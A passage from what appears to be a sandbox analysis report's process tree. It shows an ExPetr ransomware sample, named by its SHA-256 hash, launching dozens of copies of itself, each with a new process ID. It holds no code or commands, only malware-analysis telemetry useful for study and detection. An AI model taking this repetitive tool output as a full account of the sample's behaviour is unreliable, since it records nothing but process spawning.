                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:5144
                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:5240
                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:7436
                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:7832
                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:6680
                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:5904
                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:7260
                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:6976
                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:7532
                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:7608
                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:7756
                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:5316
                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:7204
                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:6956
                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:4460
                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:6944
                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:8052
                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:6892
                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:7396
                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:6952
                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:5976
                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:7256
                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:8072
                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:8044
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                      PID:2108
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:7240
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:3800
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:7752
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:7404
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:8188
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:7984
                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:7996
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:7772
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:7924
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:3660
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:7408
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:7136
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:5148
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:7196
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:5888
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:7216
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:7192
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                          PID:6352
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:1688
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                              PID:6296
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:7276
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:6368
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:7000
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:2996
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:6552
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                          PID:7740
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:7280
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:7312
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:5988
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:6036
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:7160
